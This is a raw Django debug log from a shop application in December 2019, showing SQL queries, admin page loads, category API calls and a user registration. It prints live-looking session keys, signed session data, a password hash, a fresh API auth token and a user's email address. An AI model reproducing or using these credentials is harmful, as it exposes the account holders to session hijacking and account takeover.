2019-12-10 06:16:21,706 utils 32196 139885071562496 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:16:21,750 utils 32196 139885071562496 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:16:21,767 utils 32196 139885071562496 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:16:21.763749+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 16, 21, 763749, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [10/Dec/2019 06:16:21] "GET / HTTP/1.0" 200 8868 [10/Dec/2019 06:16:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 DEBUG 2019-12-10 06:16:22,133 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:16:22.123316+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 10, 6, 16, 22, 123316, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-10 06:16:22,135 utils 32196 139885071562496 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:16:22,167 utils 32196 139885071562496 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:16:22,182 utils 32196 139885071562496 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:16:22.178942+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 16, 22, 178942, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [10/Dec/2019 06:16:22] "GET / HTTP/1.0" 200 8868 [10/Dec/2019 06:16:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [10/Dec/2019 06:16:22] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [10/Dec/2019 06:16:23] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [10/Dec/2019 06:16:23] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [10/Dec/2019 06:16:23] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-10 06:16:23,555 utils 32196 139885071562496 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:16:23.542927+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 16, 23, 542927, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:16:23,560 utils 32196 139885071562496 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:16:23,616 utils 32196 139885071562496 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:16:23,631 utils 32196 139885071562496 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:16:23.627971+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 16, 23, 627971, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:16:23] "GET /admin/ HTTP/1.0" 200 8868 [10/Dec/2019 06:16:25] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [10/Dec/2019 06:16:25] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [10/Dec/2019 06:16:25] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [10/Dec/2019 06:16:26] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [10/Dec/2019 06:16:27] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [10/Dec/2019 06:16:27] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 Not Found: /favicon.ico [10/Dec/2019 06:16:27] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-10 06:20:04,391 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 06:20:04,398 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 06:20:04,402 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 06:20:04,405 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 06:20:04,408 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 06:20:04,410 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 06:20:04,412 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 06:20:04,414 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 06:20:04,417 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 06:20:04,419 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 06:20:04,422 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 06:20:04] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 06:20:04] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:04] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:04] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [10/Dec/2019 06:20:05] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [10/Dec/2019 06:21:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:21:38,866 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yv11cuhjefidn45eqlxfb6crm5q1fsnr' LIMIT 1; args=('yv11cuhjefidn45eqlxfb6crm5q1fsnr',) DEBUG 2019-12-10 06:21:38,869 utils 32196 139885061072640 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yv11cuhjefidn45eqlxfb6crm5q1fsnr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:21:38.866549+00:00'::timestamptz); args=('yv11cuhjefidn45eqlxfb6crm5q1fsnr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 21, 38, 866549, tzinfo=)) [10/Dec/2019 06:21:38] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-10 06:24:33,909 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 06:24:33,914 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 06:24:33,919 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 06:24:33,923 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 06:24:33,927 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 06:24:33,931 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 06:24:33,935 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 06:24:33,939 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 06:24:33,942 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 06:24:33,946 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 06:24:33,949 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 06:24:33] "GET /api/v1/categories/ HTTP/1.0" 200 1619 Not Found: /api/api-token-auth/ [10/Dec/2019 06:25:28] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 [10/Dec/2019 06:26:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:26:51,398 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:26:51.384841+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 26, 51, 384841, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:26:51,401 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:26:51,406 utils 32196 139885061072640 (0.003) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-10 06:26:51,408 utils 32196 139885061072640 (0.001) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:26:51,409 utils 32196 139885061072640 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:26:51,416 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-12-10 06:26:51,601 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:26:51.597896+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 26, 51, 597896, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:26:51] "GET /auth/user/ HTTP/1.0" 200 9113 DEBUG 2019-12-10 06:26:51,891 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:26:51.881828+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 26, 51, 881828, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:26:51,894 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:26:51] "GET /jsi18n/ HTTP/1.0" 200 3223 [10/Dec/2019 06:26:52] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [10/Dec/2019 06:26:52] "GET /static/admin/img/icon-no.svg HTTP/1.0" 200 560 [10/Dec/2019 06:26:52] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 304 0 Not Found: /api/api-token-auth/ [10/Dec/2019 06:27:16] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 Not Found: /api/api-token-auth/ [10/Dec/2019 06:27:36] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 [10/Dec/2019 06:28:15] "OPTIONS /api/register HTTP/1.0" 200 187 DEBUG 2019-12-10 06:28:15,999 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert12' LIMIT 1; args=('webexpert12',) DEBUG 2019-12-10 06:28:16,002 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'webexpert12@gmail.com' LIMIT 1; args=('webexpert12@gmail.com',) DEBUG 2019-12-10 06:28:16,266 utils 32196 139885061072640 (0.003) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$gp7gINDJ2ckU$4t/kv65DHfCN1/1ShjxUE+Bq+Sds/HTBK+DrmqlnOAY=', NULL, false, 'webexpert12', '', '', 'webexpert12@gmail.com', false, true, '2019-12-10T06:28:16.012496+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$gp7gINDJ2ckU$4t/kv65DHfCN1/1ShjxUE+Bq+Sds/HTBK+DrmqlnOAY=', None, False, 'webexpert12', '', '', 'webexpert12@gmail.com', False, True, datetime.datetime(2019, 12, 10, 6, 28, 16, 12496, tzinfo=)) DEBUG 2019-12-10 06:28:16,292 utils 32196 139885061072640 (0.003) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('eacdb26f7fd7616bfb7d7c6eadb33bcc253f4e91', 8, '2019-12-10T06:28:16.288946+00:00'::timestamptz); args=('eacdb26f7fd7616bfb7d7c6eadb33bcc253f4e91', 8, datetime.datetime(2019, 12, 10, 6, 28, 16, 288946, tzinfo=)) [10/Dec/2019 06:28:16] "POST /api/register HTTP/1.0" 201 116 Not Found: /api/api-token-auth/ [10/Dec/2019 06:28:30] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 DEBUG 2019-12-10 06:28:45,879 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:28:45.865989+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 28, 45, 865989, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:28:45,883 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:28:45,887 utils 32196 139885061072640 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" 